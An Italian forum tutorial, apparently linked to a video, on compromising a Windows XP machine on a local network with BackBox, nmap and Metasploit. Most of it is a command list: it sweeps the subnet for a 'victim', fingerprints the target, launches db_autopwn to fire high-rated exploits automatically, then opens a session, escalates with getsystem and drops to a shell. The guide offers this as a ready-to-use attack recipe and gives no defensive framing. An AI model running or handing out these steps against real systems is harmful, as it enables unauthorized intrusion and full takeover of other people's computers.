Owning Windows XP with BackBox
Link Video: newbielink:http://www.youtube.com/watch?v=hZQ8HpF2Pho
[nonactive]guida relativamente semplice , usando il modulo autopwn di metasploit ^^
Tool usati:- Metasploit 3 ( incluso in Backbox )
- NMap ( Incluso in BackBox )
- Modulo AutoPwn ( incluso in Metasploit 3 )
- Postgresql ( o un altro db ^^ )
Elenco comandi:
sudo /etc/init.d/postgresql-8.4 start
nmap -sP -T4 192.168.1.1-255
sudo msfconsole
db_driver postgresql
db_connect nomeutentepostgres:"password"@localhost/msf
db_nmap -sS -sV -T4 -O 192.168.1.235
db_autopwn -x -e -p -R great
sessions -i 1
getsystem
shell
Note teoriche:Non credo servano :3
Spiegazione: Allora per prima cosa dobbiamo avviare il Database Postgres, con il comando:
sudo /etc/init.d/postgresql-8.* start
successivamente troviamo l'indirizzo ip della vittima tramite il potente PortScanner NMap,
diamo quindi:
nmap -sP -T4 192.168.1.1-255
* -sP: Aumenta la velocità , poichè non esegue portscanning ma rileva solamente se l'host è Up tramite ping

* -T4: Livello di velocità , che varia da -T1 ( Paranoid ) a -T5 ( Insane ), di solito questo valore non varia molto poichè le modalità < -T3 vengono usate principalmente per i sistemi anti intrusione ecc...
* 1-255: Esegue lo scan su un range di indirizzi che va da 192.168.1.1 a 192.168.1.255
una volta trovato l'indirizzo che nel mio caso era 192.168.1.235 copiamolo ed apriamo msfconsole,
digitiamo:
db_driver postgresql
successivamente creiamo il nostro database:
db_connect nomeutentepostgres:"password"@localhost/msf
una volta finito eseguiamo il modulo nmap dando:
db_nmap -sS -sV -T4 -O 192.168.1.235
i risultati vengono automaticamente salvati all'interno del db, quindi una volta finito diamo:
db_autopwn -x -e -p -R great
* -R great: serve per selezionare solo gli exploit che hanno grandi possibilità di riuscire
ed non appena finisce, vediamo le sessioni create con
sessions -l
e selezioniamo di interagire con una tramite:
sessions -i ID
c4tl3ash~